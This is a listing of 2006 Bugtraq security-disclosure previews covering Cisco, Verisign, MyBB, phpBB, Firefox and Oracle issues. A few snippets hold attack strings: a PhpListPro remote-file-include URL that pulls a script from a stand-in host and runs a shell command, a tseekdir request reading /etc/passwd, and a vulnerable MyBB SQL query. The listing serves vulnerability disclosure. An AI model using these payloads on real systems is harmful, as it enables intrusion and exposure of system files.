Re: SYMSA-2006-003: Cisco Secure ACS for Windows - AdministratorPassword Disclosure
2006-05-08 Greg owens (gowens covad net)
Does this include the ACS appliance engine.
Greg Owens, CCNP CCSP CISSP
Email:gowens (at) covad (dot) net
--------------------------
Sent from my Samsung I730 Wireless Handheld
-----Original Message-----
>From: "Matthew Cerha"<mcerha (at) cisco (dot) com>
>Sent: 5/8/06 6:15:58 PM
>To: "bugtraq@securityfocus.

ZDI-06-014: Verisign I-Nav ActiveX Control Code Execution Vulnerability
2006-05-10 zdi-disclosures 3com com
ZDI-06-014: Verisign I-Nav ActiveX Control Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-014.html
May 10, 2006
-- CVE ID: CVE-2006-2273
-- Affected Vendor: Verisign
-- Affected Products: i-Nav ActiveX Control
-- TippingPoint(TM) IPS Customer Protection: TippingP

Kerio WinRoute Firewall Protocol Inspection Denial
2006-05-07 SnoBMSN Hotmail De
Critical: Moderately critical
Impact: DoS
Where: From remote
Solution Status: Vendor Patch
Software: Kerio WinRoute Firewall 6.x
Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.
Description: A vulnerability has been reported in Kerio

[48Bits.com Advisory] Path conversion design flaw in Microsoft NTDLL
2006-05-09 48Bits.com [I+D Team] (vulndev 48bits com)
Hi, Microsoft Windows NTDLL.DLL is prone to an incorrect path conversion vulnerability. This flaw could be successfully exploited by malicious users in order to bypass protection mechanisms implemented by certain antivirus and antispyware products.
Advisory can also be located at -> http://www.48bit

vbulletin security Alert
2006-05-06 aura aria-security net
#----------------------------------------------------------
#Discovered by: Aura
#ARIA - SECURITY TEAM
#Gr33t to: O.U.T.L.A.W & R@1D3N & Smok3r
#-----------------------------------------------------------
» Vendor: Vbulletin
» Summary: vbulletin is a powerful Forum System
»Description

[TZO-042006] Insecure Auto-Update and File execution
2006-05-09 Thierry Zoller (Thierry Zoller lu)
_______________________________________________________________________
Zango Adware - Insecure Auto-Update and File execution
_______________________________________________________________________
Reference : TZO-042006-Zango
Author : Thierry Zoller
Advisory : http://secdev.zoller.

mybb v1.1.1(showthread.php) SQL Injection Exploit
2006-05-09 Breeeeh hotmail com
----------------------------------
found by: Breeeeh
Site: http://www.alshmokh.com
Email: Breeeeh (at) hotmail (dot) com
----------------------------------
$query = $db->query("SELECT pid FROM ".TABLE_PREFIX."posts WHERE tid='$tid' $visible ORDER BY dateline LIMIT $start, $perpage"); whi

PhpListPro 2.01 Remote File Include Vulnerability
2006-05-08 SnoBMSN Hotmail De
Credits: Discovered by: SnoB ->> SnoBmsn (at) hotmail (dot) de http://www.cyber-security.org
Vendor URL : SmartISoft http://smartisoft.com
Dork/Search for: "PHPListPro ©2001-2006 SmartISoft"
Exploit :
/config.php?returnpath=http://www.example.com/yourscript.txt?&ls%20-laF
/editsite.php?returnpa

[ MDKSA-2006:084 ] - Updated MySQL packages fix several vulnerabilities
2006-05-10 security mandriva com

Cisco Security Advisory: AVS TCP Relay Vulnerability
2006-05-10 Cisco Systems Product Security Incident Response Team (psirt cisco com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: AVS TCP Relay Vulnerability
Advisory ID: cisco-sa-20060510-avs
http://www.cisco.com/warp/public/707/cisco-sa-20060510-avs.shtml
Revision 1.0
For Public Release 2006 May 10 1600 UTC (GMT)
+-----------------------------------

Re: Milliscript 1.4 Multiple Vulnerabilities
2006-05-10 webmaster milliscripts com
Hello, I never read anything else from you. I checked the points you told me (bug in milliscripts redirection when checking $domainname for example), but they are not true. In /include/functions.php, *every* input is checked for validation. The functions are called: check_domain($dname) che

Re: phpBB 2.0.20 Full Path Disclosure and SQL Errors
2006-05-08 Maksymilian Arciemowicz (max jestsuper pl)
On Monday 08 May 2006 04:49, you wrote:
> You state these problems exist at php.net and elsewhere, so why is the
> subject titled phpbb? php.net even recommends that for production sites
> displaying of errors is discouraged. I'm unsure how your report brings
> anything new as you specify the va

Re: Firefox 1.5.0.3 code execution exploit
2006-05-07 Juha-Matti Laurio (juha-matti laurio netti fi)
This URL listed has been updated to include more recent (background) information from Mr. Gavin Sharp on 7th May. The original testcase URL is located at http://www.gavinsharp.com/tmp/ImageVuln2.html now.
- Juha-Matti
> > try this with Firefox 1.5.0.3
> »www.gavinsharp.com/tmp/ImageVuln.html

Re: tseekdir.cgi<--Local File Include
2006-05-10 Steven M. Christey (coley mitre org)
>found by: BoNy-m
Also apparently found by durito in September 2004, as identified in the Turbo Seek product.
> /tseekdir.cgi?id=1055&location=/etc/passwd%00
This is the same exploit vector as what was reported in Secunia SA12500 and BID 11163: http://www.securityfocus.com/bid/11163/exploit

Oracle - the last word
2006-05-10 David Litchfield (davidl ngssoftware com)
A few people have asked me recently what it is I'm actually looking for from Oracle. I have a nice little laundry list of things, of course, but mostly all I've been waiting for is to hear Oracle say, "We admit we have a problem with regards to security, but here's our strategy and we're going

Firefox 1.5.0.3 - DoS
2006-05-06 p4 werterxyz gmail com (1 replies)

Hackmaster Group DMCounter Remote File Include
2006-05-10 c-w-m hackmaster us
Script: DMCounter
Version: 0.9.2-b
Language: PHP
Problem: Remote File Include
Vendor: http://Www.HackMaster.Us
Discovered by: C-W-M(at)hackmaster(dot)us
Description
=============
Statistics software based on PHP which does not require any database support but just uses flat files. Daily + m

Multiple SQL Injection Vulnerabilities in Dreamweaver Generated Code
2006-05-09 Brian Gallagher (brian diamondsea com)
Multiple SQL Injection Vulnerabilities in Dreamweaver Generated Code
INFORMATION:
-------------------------
Class: SQL Injection
CVE: CVE-2006-2042
Remote: Yes
Local: Yes
Published: May 09, 2006
Credit: Brian Gallagher <brian (at) diamondsea (dot) com>
Vulnerable: Dreamweaver Ultradev Dreamweaver MX Dre

[ GLSA 200605-12 ] Quake 3 engine based games: Buffer Overflow
2006-05-10 Sune Kloppenborg Jeppesen (jaervosz gentoo org)
McAfee Avert Labs Security Advisory
Public Release Date: 2006-05-09
Microsoft MSDTC NdrAllocate Validation Vulnerability
CVE-2006-0034
______________________________________________________________________
Synopsis
There is an RPC procedure within the MSDTC interface i